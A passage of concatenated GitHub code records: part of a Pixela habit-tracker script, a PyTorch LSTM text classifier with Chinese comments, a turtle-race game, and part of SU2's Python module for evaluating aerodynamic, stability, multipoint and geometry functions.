\"20231212\"\ndelete_endpoint = f\"{pixela_endpoint}/{USERNAME}/graphs/{GRAPH_ID}/{day_delete}\"\n\n# response = requests.delete(url=delete_endpoint, headers=graph_headers)\n# print(response.text)\n","repo_name":"JonatasViscaino/100-days-of-code-Python","sub_path":"Day 37 - Habit tracker/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"74431956361","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\nimport torch.nn.init as init\nimport numpy as np\n\n\nclass LSTM(nn.Module):\n \"\"\"\n 自定义双通道 LSTM 模型\n 一个通道用来 随机embedding\n 一个通道用来 预训练embedding\n \"\"\"\n\n def __init__(self, args):\n super(LSTM, self).__init__()\n self.args = args\n self.hidden_dim = args.lstm_hidden_dim\n self.lstm_num_layers = args.lstm_num_layers\n V = args.embed_num # 词的个数\n D = args.embed_dim # 词的维度(一个词的向量)\n C = args.class_num # 多少个分类\n\n # nn.Embedding 设置词向量,生成随机矩阵,V行,D列,V*D\n self.embed = nn.Embedding(V, D)\n # 如果使用预训练embedding 想要微调权重 就需要下面这句\n # self.embed.weight.requires_grad=True\n\n \"\"\"\n input(seq_len, batch, input_size)\n input包含了 这三个参数,但是喂数据给模型的时候是包括了这些数据的,所以不用管\n 所以 这里只输入了 D 词的维度,因为 我们输入的数据是 是包括完整的数据的 是一个 feature\n \n 因为没有定义 h0 c0 所以这里要输入 具体的 hidden_size num_layers 然后系统自动定义\n lstm的 h0 和 c0 如果不初始化,PyTorch默认初始化为全零的张量\n h0(num_layers * num_directions, batch, hidden_size)\n c0(num_layers * num_directions, batch, hidden_size)\n \n hidden_size:隐藏层的特征维度\n num_layers:lstm隐层的层数,默认为1 双向lstm层数翻倍\n num_directions: 就是 方向,是单向lstm(1) 还是 双向lstm(2)\n bias:False则bih=0和bhh=0. 
默认为True\n batch_first:True则输入输出的数据格式为 (batch, seq, feature)\n dropout:除最后一层,每一层的输出都进行dropout,默认为: 0\n \"\"\"\n # lstm\n self.lstm = nn.LSTM(D, self.hidden_dim, dropout=args.dropout, num_layers=self.lstm_num_layers)\n # 将lstm的所有权重矩阵进行初始化\n # torch.nn.init.xavier_normal_(tensor, gain=1) 正态分布~N(0,std)\n if args.lstm_weight_init:\n print(\"初始化 W 矩阵\")\n init.xavier_normal(self.lstm.all_weights[0][0], gain=np.sqrt(args.lstm_weight_init_value))\n init.xavier_normal(self.lstm.all_weights[0][1], gain=np.sqrt(args.lstm_weight_init_value))\n\n # 进行dropout处理 避免过拟合\n # 定义dropout\n self.dropout = nn.Dropout(args.dropout)\n # 对 embedding进行dropout\n self.embed_dropout = nn.Dropout(args.embed_dropout)\n # 线性层\n self.hidden2lable = nn.Linear(self.hidden_dim, C)\n\n # 重载 前向传播 自定义前向传播\n def forward(self, x):\n # 前向传播 通过模型计算预测值\n embed = self.embed(x) # (N, W, D)\n # embed = self.embed_dropout(embed)\n x = embed.view(len(x), embed.size(1), -1)\n\n lstm_out, _ = self.lstm(x)\n # lstm_out, self.hidden = self.lstm(x, self.hidden)\n # 返回输入矩阵input的转置,交换维度dim0和dim1。输入张量与输出张量共享内存\n lstm_out = torch.transpose(lstm_out, 0, 1)\n lstm_out = torch.transpose(lstm_out, 1, 2)\n\n # 激活函数\n lstm_out = F.tanh(lstm_out)\n # 池化\n lstm_out = F.max_pool1d(lstm_out, lstm_out.size(2)).squeeze(2)\n # dropout\n lstm_out = self.dropout(lstm_out)\n # 线性层\n logit = self.hidden2lable(lstm_out)\n return logit\n","repo_name":"xhjcxxl/NLP_Models","sub_path":"CNN_Classificaion_all_models/models/model_LSTM.py","file_name":"model_LSTM.py","file_ext":"py","file_size_in_byte":3682,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"34937858839","text":"import turtle\nimport random\n\nwn = turtle.Screen()\nwn.bgcolor(\"blue\")\nroad = turtle.Turtle()\nroad.color(\"black\")\nroad.speed(0)\nroad.penup()\nroad.goto(-100,140)\nfor move in range(11):\n road.write(move, align='center')\n road.right(90)\n for num in range(8):\n road.penup()\n road.forward(10)\n road.pendown()\n road.forward(10)\n road.penup()\n road.backward(160)\n road.left(90)\n road.forward(20)\nroad.hideturtle() \n \nt = turtle.Turtle()\nt.right(90)\nt.color(\"black\")\nt.penup()\nt.goto(180,140)\nt.setheading(90)\nt.write(\"START\",move=True,align=\"right\",font=(\"Freestyle Script\",15,\"normal\")) \nt.hideturtle()\njacob = turtle.Turtle()\njacob.color('red')\njacob.shape('turtle')\njacob.penup()\njacob.goto(-160, 120)\njacob.pendown()\nkara = turtle.Turtle()\nkara.color('green')\nkara.shape('turtle')\nkara.penup()\nkara.goto(-160, 90)\nkara.pendown()\ndeodat = turtle.Turtle()\ndeodat.shape('turtle')\ndeodat.color('orange')\ndeodat.penup()\ndeodat.goto(-160, 60)\ndeodat.pendown()\ncrystal = turtle.Turtle()\ncrystal.shape('turtle')\ncrystal.color('purple')\ncrystal.penup()\ncrystal.goto(-160, 30)\ncrystal.pendown()\nnaseera = turtle.Turtle()\nnaseera.shape('turtle')\nnaseera.color('white')\nnaseera.penup()\nnaseera.goto(-160,0)\nnaseera.pendown()\nnames = [jacob, kara, deodat, crystal, naseera]\nnames2= [\"jacob\",\"kara\",\"deodat\",\"crystal\",\"naseera\"]\ndef race():\n holdB = 0\n jacobB = 0\n karaB = 0\n deodatB = 0\n crystalB = 0\n naseeraB = 0\n for i in range(54):\n for i in range(5):\n names[i].fd(random.randrange(1,10))\n if names[i].xcor() >= 110:\n break\n if names[i].xcor() >= 110:\n print(\"\" + names2[i]+\" \" + 
\"Wins!!!\")\nrace()","repo_name":"sadenrichards/turtlerace","sub_path":"turtlerace.py","file_name":"turtlerace.py","file_ext":"py","file_size_in_byte":1716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"18569450933","text":"import os, sys, shutil, copy, time, subprocess\nfrom .. import run as su2run\nfrom .. import io as su2io\nfrom .. import util as su2util\nfrom ..io import redirect_folder, redirect_output\n\n\n# ----------------------------------------------------------------------\n# Main Function Interface\n# ----------------------------------------------------------------------\n\n\ndef function(func_name, config, state=None):\n \"\"\"val = SU2.eval.func(func_name,config,state=None)\n\n Evaluates the aerodynamics and geometry functions.\n\n Wraps:\n SU2.eval.aerodynamics()\n SU2.eval.geometry()\n\n Assumptions:\n Config is already setup for deformation.\n Mesh need not be deformed.\n Updates config and state by reference.\n Redundancy if state.FUNCTIONS is not empty.\n\n Executes in:\n ./DIRECT or ./GEOMETRY\n\n Inputs:\n func_name - SU2 objective function name or 'ALL'\n config - an SU2 config\n state - optional, an SU2 state\n\n Outputs:\n If func_name is 'ALL', returns a Bunch() of\n functions with keys of objective function names\n and values of objective function floats.\n Otherwise returns a float.\n \"\"\"\n\n # initialize\n state = su2io.State(state)\n\n # check for multiple objectives\n multi_objective = type(func_name) == list\n\n # func_name_string is only used to check whether the function has already been evaluated.\n func_name_string = func_name\n if multi_objective:\n func_name_string = func_name[0]\n\n # redundancy check\n if not func_name_string in state[\"FUNCTIONS\"]:\n\n # Aerodynamics\n if multi_objective or func_name == \"ALL\":\n aerodynamics(config, state)\n\n elif func_name in su2io.historyOutFields:\n if (\n su2io.historyOutFields[func_name][\"TYPE\"] == \"COEFFICIENT\"\n or su2io.historyOutFields[func_name][\"TYPE\"] == \"D_COEFFICIENT\"\n ):\n aerodynamics(config, state)\n\n # Stability\n elif func_name in su2io.optnames_stab:\n stability(config, state)\n\n # Multipoint\n elif func_name in su2io.optnames_multi:\n multipoint(config, state)\n\n # Geometry\n elif func_name in su2io.optnames_geo:\n geometry(func_name, config, state)\n\n else:\n raise Exception(\n \"unknown function name, %s. 
Please check config_template.cfg for updated list of function names\"\n % func_name\n )\n\n #: if not redundant\n\n # prepare output\n if func_name == \"ALL\":\n func_out = state[\"FUNCTIONS\"]\n elif multi_objective:\n # If combine_objective is true, use the 'combo' output.\n func_out = state[\"FUNCTIONS\"][\"COMBO\"]\n else:\n func_out = state[\"FUNCTIONS\"][func_name]\n\n if func_name_string in config[\"OPT_OBJECTIVE\"]:\n marker = config[\"OPT_OBJECTIVE\"][func_name_string][\"MARKER\"]\n if func_name_string in su2io.per_surface_map:\n name = su2io.per_surface_map[func_name_string] + \"_\" + marker\n if name in state[\"FUNCTIONS\"]:\n func_out = state[\"FUNCTIONS\"][name]\n\n return copy.deepcopy(func_out)\n\n\n#: def function()\n\n\n# ----------------------------------------------------------------------\n# Aerodynamic Functions\n# ----------------------------------------------------------------------\n\n\ndef aerodynamics(config, state=None):\n \"\"\"vals = SU2.eval.aerodynamics(config,state=None)\n\n Evaluates aerodynamics with the following:\n SU2.run.deform()\n SU2.run.direct()\n\n Assumptions:\n Config is already setup for deformation.\n Mesh may or may not be deformed.\n Updates config and state by reference.\n Redundancy if state.FUNCTIONS is not empty.\n\n Executes in:\n ./DIRECT\n\n Inputs:\n config - an SU2 config\n state - optional, an SU2 state\n\n Outputs:\n Bunch() of functions with keys of objective function names\n and values of objective function floats.\n \"\"\"\n\n # ----------------------------------------------------\n # Initialize\n # ----------------------------------------------------\n\n # initialize\n state = su2io.State(state)\n\n # Make sure to output aerodynamic coeff.\n if not \"AERO_COEFF\" in config[\"HISTORY_OUTPUT\"]:\n config[\"HISTORY_OUTPUT\"].append(\"AERO_COEFF\")\n\n if not \"MESH\" in state.FILES:\n state.FILES.MESH = config[\"MESH_FILENAME\"]\n special_cases = su2io.get_specialCases(config)\n\n # console output\n if config.get(\"CONSOLE\", \"VERBOSE\") in [\"QUIET\", \"CONCISE\"]:\n log_direct = \"log_Direct.out\"\n else:\n log_direct = None\n\n # ----------------------------------------------------\n # Update Mesh\n # ----------------------------------------------------\n\n # does decomposition and deformation\n info = update_mesh(config, state)\n\n # ----------------------------------------------------\n # Adaptation (not implemented)\n # ----------------------------------------------------\n\n # if not state.['ADAPTED_FUNC']:\n # config = su2run.adaptation(config)\n # state['ADAPTED_FUNC'] = True\n\n # ----------------------------------------------------\n # Direct Solution\n # ----------------------------------------------------\n opt_names = []\n for key in su2io.historyOutFields:\n if su2io.historyOutFields[key][\"TYPE\"] == \"COEFFICIENT\":\n opt_names.append(key)\n\n # redundancy check\n direct_done = all([key in state.FUNCTIONS for key in opt_names])\n if direct_done:\n # return aerodynamic function values\n aero = su2util.ordered_bunch()\n for key in opt_names:\n if key in state.FUNCTIONS:\n aero[key] = state.FUNCTIONS[key]\n return copy.deepcopy(aero)\n #: if redundant\n\n # files to pull\n files = state.FILES\n pull = []\n link = []\n\n # files: mesh\n name = files[\"MESH\"]\n name = su2io.expand_part(name, config)\n link.extend(name)\n\n pull.extend(config.get(\"CONFIG_LIST\", []))\n\n # files: restarts\n if (\n config.get(\"TIME_DOMAIN\", \"NO\") == \"YES\"\n and config.get(\"RESTART_SOL\", \"NO\") == \"YES\"\n ):\n if 
\"RESTART_FILE_1\" in files: # not the case for directdiff restart\n name = files[\"RESTART_FILE_1\"]\n name = su2io.expand_part(name, config)\n link.extend(name)\n if \"RESTART_FILE_2\" in files: # not the case for 1st order time stepping\n name = files[\"RESTART_FILE_2\"]\n name = su2io.expand_part(name, config)\n link.extend(name)\n\n if \"FLOW_META\" in files:\n pull.append(files[\"FLOW_META\"])\n\n # files: direct solution\n if \"DIRECT\" in files:\n name = files[\"DIRECT\"]\n name = su2io.expand_zones(name, config)\n name = su2io.expand_time(name, config)\n link.extend(name)\n ##config['RESTART_SOL'] = 'YES' # don't override config file\n else:\n if (\n config.get(\"TIME_DOMAIN\", \"NO\") != \"YES\"\n ): # rules out steady state optimization special cases.\n config[\"RESTART_SOL\"] = \"NO\" # for shape optimization with restart files.\n\n # files: target equivarea distribution\n if \"EQUIV_AREA\" in special_cases and \"TARGET_EA\" in files:\n pull.append(files[\"TARGET_EA\"])\n\n # files: target pressure distribution\n if \"INV_DESIGN_CP\" in special_cases and \"TARGET_CP\" in files:\n pull.append(files[\"TARGET_CP\"])\n\n # files: target heat flux distribution\n if \"INV_DESIGN_HEATFLUX\" in special_cases and \"TARGET_HEATFLUX\" in files:\n pull.append(files[\"TARGET_HEATFLUX\"])\n\n # output redirection\n with redirect_folder(\"DIRECT\", pull, link) as push:\n with redirect_output(log_direct):\n\n # # RUN DIRECT SOLUTION # #\n info = su2run.direct(config)\n\n konfig = copy.deepcopy(config)\n \"\"\"\n If the time convergence criterion was activated, we have less time iterations.\n Store the changed values of TIME_ITER, ITER_AVERAGE_OBJ and UNST_ADJOINT_ITER in\n info.WND_CAUCHY_DATA\"\"\"\n if (\n konfig.get(\"WINDOW_CAUCHY_CRIT\", \"NO\") == \"YES\"\n and konfig.TIME_MARCHING != \"NO\"\n ): # Tranfer Convergence Data, if necessary\n konfig[\"TIME_ITER\"] = info.WND_CAUCHY_DATA[\"TIME_ITER\"]\n konfig[\"ITER_AVERAGE_OBJ\"] = info.WND_CAUCHY_DATA[\"ITER_AVERAGE_OBJ\"]\n konfig[\"UNST_ADJOINT_ITER\"] = info.WND_CAUCHY_DATA[\"UNST_ADJOINT_ITER\"]\n\n su2io.restart2solution(konfig, info)\n state.update(info)\n\n # direct files to push\n name = info.FILES[\"DIRECT\"]\n name = su2io.expand_zones(name, konfig)\n name = su2io.expand_time(name, konfig)\n push.extend(name)\n\n # pressure files to push\n if \"TARGET_CP\" in info.FILES:\n push.append(info.FILES[\"TARGET_CP\"])\n\n # heat flux files to push\n if \"TARGET_HEATFLUX\" in info.FILES:\n push.append(info.FILES[\"TARGET_HEATFLUX\"])\n\n if \"FLOW_META\" in info.FILES:\n push.append(info.FILES[\"FLOW_META\"])\n\n #: with output redirection\n su2io.update_persurface(konfig, state)\n # return output\n funcs = su2util.ordered_bunch()\n for key in state[\"FUNCTIONS\"]:\n funcs[key] = state[\"FUNCTIONS\"][key]\n\n return funcs\n\n\n#: def aerodynamics()\n\n\n# ----------------------------------------------------------------------\n# Stability Functions\n# ----------------------------------------------------------------------\n\n\ndef stability(config, state=None, step=1e-2):\n\n folder = \"STABILITY\" # os.path.join('STABILITY',func_name) #STABILITY/D_MOMENT_Y_D_ALPHA/\n\n # ----------------------------------------------------\n # Initialize\n # ----------------------------------------------------\n\n # initialize\n state = su2io.State(state)\n if not \"MESH\" in state.FILES:\n state.FILES.MESH = config[\"MESH_FILENAME\"]\n special_cases = su2io.get_specialCases(config)\n\n # console output\n if config.get(\"CONSOLE\", \"VERBOSE\") in 
[\"QUIET\", \"CONCISE\"]:\n log_direct = \"log_Direct.out\"\n else:\n log_direct = None\n\n # ----------------------------------------------------\n # Update Mesh\n # ----------------------------------------------------\n\n # does decomposition and deformation\n info = update_mesh(config, state)\n\n # ----------------------------------------------------\n # CENTRAL POINT\n # ----------------------------------------------------\n\n # will run in DIRECT/\n func_0 = aerodynamics(config, state)\n\n # ----------------------------------------------------\n # Run Forward Point\n # ----------------------------------------------------\n\n # files to pull\n files = state.FILES\n pull = []\n link = []\n\n # files: mesh\n name = files[\"MESH\"]\n name = su2io.expand_part(name, config)\n link.extend(name)\n\n # files: direct solution\n if \"DIRECT\" in files:\n name = files[\"DIRECT\"]\n name = su2io.expand_time(name, config)\n link.extend(name)\n ##config['RESTART_SOL'] = 'YES' # don't override config file\n else:\n config[\"RESTART_SOL\"] = \"NO\"\n\n # files: target equivarea distribution\n if \"EQUIV_AREA\" in special_cases and \"TARGET_EA\" in files:\n pull.append(files[\"TARGET_EA\"])\n\n # files: target pressure distribution\n if \"INV_DESIGN_CP\" in special_cases and \"TARGET_CP\" in files:\n pull.append(files[\"TARGET_CP\"])\n\n # files: target heat flux distribution\n if \"INV_DESIGN_HEATFLUX\" in special_cases and \"TARGET_HEATFLUX\" in files:\n pull.append(files[\"TARGET_HEATFLUX\"])\n\n # pull needed files, start folder\n with redirect_folder(folder, pull, link) as push:\n with redirect_output(log_direct):\n\n konfig = copy.deepcopy(config)\n ztate = copy.deepcopy(state)\n\n # TODO: GENERALIZE\n konfig.AOA = konfig.AOA + step\n ztate.FUNCTIONS.clear()\n\n func_1 = aerodynamics(konfig, ztate)\n\n ## direct files to store\n # name = ztate.FILES['DIRECT']\n # if not 'STABILITY' in state.FILES:\n # state.FILES.STABILITY = su2io.ordered_bunch()\n # state.FILES.STABILITY['DIRECT'] = name\n\n ## equivarea files to store\n # if 'WEIGHT_NF' in ztate.FILES:\n # state.FILES.STABILITY['WEIGHT_NF'] = ztate.FILES['WEIGHT_NF']\n\n # ----------------------------------------------------\n # DIFFERENCING\n # ----------------------------------------------------\n\n for derv_name in su2io.optnames_stab:\n\n matches = [k for k in su2io.optnames_aero if k in derv_name]\n if not len(matches) == 1:\n continue\n func_name = matches[0]\n\n obj_func = (func_1[func_name] - func_0[func_name]) / step\n\n state.FUNCTIONS[derv_name] = obj_func\n\n # return output\n funcs = su2util.ordered_bunch()\n for key in su2io.optnames_stab:\n if key in state[\"FUNCTIONS\"]:\n funcs[key] = state[\"FUNCTIONS\"][key]\n\n return funcs\n\n\n# ----------------------------------------------------------------------\n# Multipoint Functions\n# ----------------------------------------------------------------------\n\n\ndef multipoint(config, state=None, step=1e-2):\n\n mach_list = (\n config[\"MULTIPOINT_MACH_NUMBER\"].replace(\"(\", \"\").replace(\")\", \"\").split(\",\")\n )\n reynolds_list = (\n config[\"MULTIPOINT_REYNOLDS_NUMBER\"]\n .replace(\"(\", \"\")\n .replace(\")\", \"\")\n .split(\",\")\n )\n freestream_temp_list = (\n config[\"MULTIPOINT_FREESTREAM_TEMPERATURE\"]\n .replace(\"(\", \"\")\n .replace(\")\", \"\")\n .split(\",\")\n )\n freestream_press_list = (\n config[\"MULTIPOINT_FREESTREAM_PRESSURE\"]\n .replace(\"(\", \"\")\n .replace(\")\", \"\")\n .split(\",\")\n )\n aoa_list = config[\"MULTIPOINT_AOA\"].replace(\"(\", 
\"\").replace(\")\", \"\").split(\",\")\n sideslip_list = (\n config[\"MULTIPOINT_SIDESLIP_ANGLE\"].replace(\"(\", \"\").replace(\")\", \"\").split(\",\")\n )\n target_cl_list = (\n config[\"MULTIPOINT_TARGET_CL\"].replace(\"(\", \"\").replace(\")\", \"\").split(\",\")\n )\n weight_list = (\n config[\"MULTIPOINT_WEIGHT\"].replace(\"(\", \"\").replace(\")\", \"\").split(\",\")\n )\n outlet_value_list = (\n config[\"MULTIPOINT_OUTLET_VALUE\"].replace(\"(\", \"\").replace(\")\", \"\").split(\",\")\n )\n solution_flow_list = su2io.expand_multipoint(config.SOLUTION_FILENAME, config)\n flow_meta_list = su2io.expand_multipoint(\"flow.meta\", config)\n restart_sol = config[\"RESTART_SOL\"]\n dv_value_old = config[\"DV_VALUE_OLD\"]\n\n func = []\n folder = []\n for i in range(len(weight_list)):\n func.append(0)\n folder.append(0)\n\n for i in range(len(weight_list)):\n folder[i] = \"MULTIPOINT_\" + str(i)\n\n opt_names = []\n for key in su2io.historyOutFields:\n if su2io.historyOutFields[key][\"TYPE\"] == \"COEFFICIENT\":\n opt_names.append(key)\n\n # ----------------------------------------------------\n # Initialize\n # ----------------------------------------------------\n\n # initialize\n state = su2io.State(state)\n if not \"MESH\" in state.FILES:\n state.FILES.MESH = config[\"MESH_FILENAME\"]\n special_cases = su2io.get_specialCases(config)\n\n # console output\n if config.get(\"CONSOLE\", \"VERBOSE\") in [\"QUIET\", \"CONCISE\"]:\n log_direct = \"log_Direct.out\"\n else:\n log_direct = None\n\n # ----------------------------------------------------\n # Update Mesh\n # ----------------------------------------------------\n\n # If multiple meshes specified, use relevant mesh\n if \"MULTIPOINT_MESH_FILENAME\" in state.FILES:\n state.FILES.MESH = state.FILES.MULTIPOINT_MESH_FILENAME[0]\n config.MESH_FILENAME = state.FILES.MULTIPOINT_MESH_FILENAME[0]\n\n # does decomposition and deformation\n info = update_mesh(config, state)\n\n # ----------------------------------------------------\n # FIRST POINT\n # ----------------------------------------------------\n\n # will run in DIRECT/\n\n config.AOA = aoa_list[0]\n config.SIDESLIP_ANGLE = sideslip_list[0]\n config.MACH_NUMBER = mach_list[0]\n config.REYNOLDS_NUMBER = reynolds_list[0]\n config.FREESTREAM_TEMPERATURE = freestream_temp_list[0]\n config.FREESTREAM_PRESSURE = freestream_press_list[0]\n config.TARGET_CL = target_cl_list[0]\n orig_marker_outlet = config[\"MARKER_OUTLET\"]\n orig_marker_outlet = orig_marker_outlet.replace(\"(\", \"\").replace(\")\", \"\").split(\",\")\n new_marker_outlet = \"(\" + orig_marker_outlet[0] + \",\" + outlet_value_list[0] + \")\"\n config.MARKER_OUTLET = new_marker_outlet\n config.SOLUTION_FILENAME = solution_flow_list[0]\n\n # If solution file for the first point is available, use it\n if \"MULTIPOINT_DIRECT\" in state.FILES and state.FILES.MULTIPOINT_DIRECT[0]:\n state.FILES[\"DIRECT\"] = state.FILES.MULTIPOINT_DIRECT[0]\n\n # If flow.meta file for the first point is available, rename it before using it\n if \"MULTIPOINT_FLOW_META\" in state.FILES and state.FILES.MULTIPOINT_FLOW_META[0]:\n os.rename(state.FILES.MULTIPOINT_FLOW_META[0], \"flow.meta\")\n state.FILES[\"FLOW_META\"] = \"flow.meta\"\n\n func[0] = aerodynamics(config, state)\n\n # change name of flow.meta back to multipoint name\n if os.path.exists(\"flow.meta\"):\n os.rename(\"flow.meta\", flow_meta_list[0])\n state.FILES[\"FLOW_META\"] = flow_meta_list[0]\n\n src = os.getcwd()\n src = os.path.abspath(src).rstrip(\"/\") + \"/DIRECT/\"\n\n # files to 
pull\n files = state.FILES\n pull = []\n link = []\n\n # files: mesh\n name = files[\"MESH\"]\n name = su2io.expand_part(name, config)\n link.extend(name)\n\n # files: direct solution\n if \"DIRECT\" in files:\n name = files[\"DIRECT\"]\n name = su2io.expand_time(name, config)\n link.extend(name)\n else:\n config[\"RESTART_SOL\"] = \"NO\"\n\n # files: meta data for the flow\n if \"FLOW_META\" in files:\n pull.append(files[\"FLOW_META\"])\n\n # files: target equivarea distribution\n if \"EQUIV_AREA\" in special_cases and \"TARGET_EA\" in files:\n pull.append(files[\"TARGET_EA\"])\n\n # files: target pressure distribution\n if \"INV_DESIGN_CP\" in special_cases and \"TARGET_CP\" in files:\n pull.append(files[\"TARGET_CP\"])\n\n # files: target heat flux distribution\n if \"INV_DESIGN_HEATFLUX\" in special_cases and \"TARGET_HEATFLUX\" in files:\n pull.append(files[\"TARGET_HEATFLUX\"])\n\n # pull needed files, start folder_0\n with redirect_folder(folder[0], pull, link) as push:\n with redirect_output(log_direct):\n\n konfig = copy.deepcopy(config)\n ztate = copy.deepcopy(state)\n # Reset restart to original value\n konfig[\"RESTART_SOL\"] = restart_sol\n\n dst = os.getcwd()\n dst = os.path.abspath(dst).rstrip(\"/\") + \"/\" + \"DIRECT\"\n\n # make unix link\n string = \"ln -s \" + src + \" \" + dst\n stringlist = string.split()\n subprocess.Popen(stringlist)\n\n for i in range(len(weight_list) - 1):\n\n konfig = copy.deepcopy(config)\n ztate = copy.deepcopy(state)\n\n konfig.SOLUTION_FILENAME = solution_flow_list[i + 1]\n\n # delete direct solution file from previous point\n if \"DIRECT\" in ztate.FILES:\n del ztate.FILES.DIRECT\n\n if \"FLOW_META\" in ztate.FILES:\n del ztate.FILES.FLOW_META\n\n # use direct solution file from relevant point\n if \"MULTIPOINT_DIRECT\" in state.FILES and state.FILES.MULTIPOINT_DIRECT[i + 1]:\n ztate.FILES[\"DIRECT\"] = state.FILES.MULTIPOINT_DIRECT[i + 1]\n\n # use flow.meta file from relevant point\n if (\n \"MULTIPOINT_FLOW_META\" in state.FILES\n and state.FILES.MULTIPOINT_FLOW_META[i + 1]\n ):\n ztate.FILES[\"FLOW_META\"] = state.FILES.MULTIPOINT_FLOW_META[i + 1]\n\n # use mesh file from relevant point\n if \"MULTIPOINT_MESH_FILENAME\" in ztate.FILES:\n ztate.FILES.MESH = ztate.FILES.MULTIPOINT_MESH_FILENAME[i + 1]\n konfig.MESH_FILENAME = ztate.FILES.MULTIPOINT_MESH_FILENAME[i + 1]\n konfig[\"DV_VALUE_OLD\"] = dv_value_old\n\n files = ztate.FILES\n link = []\n pull = []\n\n # files: mesh\n name = files[\"MESH\"]\n name = su2io.expand_part(name, konfig)\n link.extend(name)\n\n # files: direction solution\n if \"DIRECT\" in files:\n name = files[\"DIRECT\"]\n name = su2io.expand_time(name, konfig)\n link.extend(name)\n else:\n konfig[\"RESTART_SOL\"] = \"NO\"\n\n # files: meta data for the flow\n if \"FLOW_META\" in files:\n pull.append(files[\"FLOW_META\"])\n\n # pull needed files, start folder_1\n with redirect_folder(folder[i + 1], pull, link) as push:\n with redirect_output(log_direct):\n\n # Perform deformation on multipoint mesh\n if \"MULTIPOINT_MESH_FILENAME\" in state.FILES:\n info = update_mesh(konfig, ztate)\n\n # Update config values\n konfig.AOA = aoa_list[i + 1]\n konfig.SIDESLIP_ANGLE = sideslip_list[i + 1]\n konfig.MACH_NUMBER = mach_list[i + 1]\n konfig.REYNOLDS_NUMBER = reynolds_list[i + 1]\n konfig.FREESTREAM_TEMPERATURE = freestream_temp_list[i + 1]\n konfig.FREESTREAM_PRESSURE = freestream_press_list[i + 1]\n konfig.TARGET_CL = target_cl_list[i + 1]\n orig_marker_outlet = config[\"MARKER_OUTLET\"]\n orig_marker_outlet = (\n 
orig_marker_outlet.replace(\"(\", \"\").replace(\")\", \"\").split(\",\")\n )\n new_marker_outlet = (\n \"(\" + orig_marker_outlet[0] + \",\" + outlet_value_list[i + 1] + \")\"\n )\n konfig.MARKER_OUTLET = new_marker_outlet\n\n ztate.FUNCTIONS.clear()\n\n # rename meta data to flow.meta\n if \"FLOW_META\" in ztate.FILES:\n ztate.FILES[\"FLOW_META\"] = \"flow.meta\"\n os.rename(ztate.FILES.MULTIPOINT_FLOW_META[i + 1], \"flow.meta\")\n\n func[i + 1] = aerodynamics(konfig, ztate)\n\n dst = os.getcwd()\n\n # revert name of flow.meta file to multipoint name\n if os.path.exists(\"flow.meta\"):\n os.rename(\"flow.meta\", flow_meta_list[i + 1])\n ztate.FILES[\"FLOW_META\"] = flow_meta_list[i + 1]\n dst_flow_meta = (\n os.path.abspath(dst).rstrip(\"/\")\n + \"/\"\n + ztate.FILES[\"FLOW_META\"]\n )\n push.append(ztate.FILES[\"FLOW_META\"])\n\n # direct files to push\n dst_direct = (\n os.path.abspath(dst).rstrip(\"/\") + \"/\" + ztate.FILES[\"DIRECT\"]\n )\n name = ztate.FILES[\"DIRECT\"]\n name = su2io.expand_zones(name, konfig)\n name = su2io.expand_time(name, konfig)\n push.extend(name)\n\n if \"MULTIPOINT_MESH_FILENAME\" in state.FILES:\n # Mesh files to push\n dst_mesh = (\n os.path.abspath(dst).rstrip(\"/\") + \"/\" + ztate.FILES[\"MESH\"]\n )\n name = ztate.FILES[\"MESH\"]\n name = su2io.expand_part(name, konfig)\n push.extend(name)\n\n # Link direct solution to MULTIPOINT_# folder\n src = os.getcwd()\n src_direct = os.path.abspath(src).rstrip(\"/\") + \"/\" + ztate.FILES[\"DIRECT\"]\n\n # make unix link\n os.symlink(src_direct, dst_direct)\n\n # If the mesh doesn't already exist, link it\n if \"MULTIPOINT_MESH_FILENAME\" in state.FILES:\n src_mesh = os.path.abspath(src).rstrip(\"/\") + \"/\" + ztate.FILES[\"MESH\"]\n if not os.path.exists(src_mesh):\n os.symlink(src_mesh, dst_mesh)\n\n # link flow.meta\n if \"MULTIPOINT_FLOW_META\" in state.FILES:\n src_flow_meta = (\n os.path.abspath(src).rstrip(\"/\") + \"/\" + ztate.FILES[\"FLOW_META\"]\n )\n if not os.path.exists(src_flow_meta):\n os.symlink(src_flow_meta, dst_flow_meta)\n\n # Update MULTIPOINT_DIRECT in state.FILES\n state.FILES.MULTIPOINT_DIRECT = solution_flow_list\n if \"FLOW_META\" in state.FILES:\n state.FILES.MULTIPOINT_FLOW_META = flow_meta_list\n\n # ----------------------------------------------------\n # WEIGHT FUNCTIONS\n # ----------------------------------------------------\n\n for derv_name in su2io.optnames_multi:\n matches = [k for k in opt_names if k in derv_name]\n if not len(matches) == 1:\n continue\n func_name = matches[0]\n obj_func = 0.0\n for i in range(len(weight_list)):\n obj_func = obj_func + float(weight_list[i]) * func[i][func_name]\n\n state.FUNCTIONS[derv_name] = obj_func\n\n # return output\n funcs = su2util.ordered_bunch()\n for key in su2io.optnames_multi:\n if key in state[\"FUNCTIONS\"]:\n funcs[key] = state[\"FUNCTIONS\"][key]\n\n return funcs\n\n\n# ----------------------------------------------------------------------\n# Geometric Functions\n# ----------------------------------------------------------------------\n\n\ndef geometry(func_name, config, state=None):\n \"\"\"val = SU2.eval.geometry(config,state=None)\n\n Evaluates geometry with the following:\n SU2.run.deform()\n SU2.run.geometry()\n\n Assumptions:\n Config is already setup for deformation.\n Mesh may or may not be deformed.\n Updates config and state by reference.\n Redundancy if state.FUNCTIONS does not have func_name.\n\n Executes in:\n ./GEOMETRY\n\n Inputs:\n config - an SU2 config\n state - optional, an SU2 state\n\n Outputs:\n 
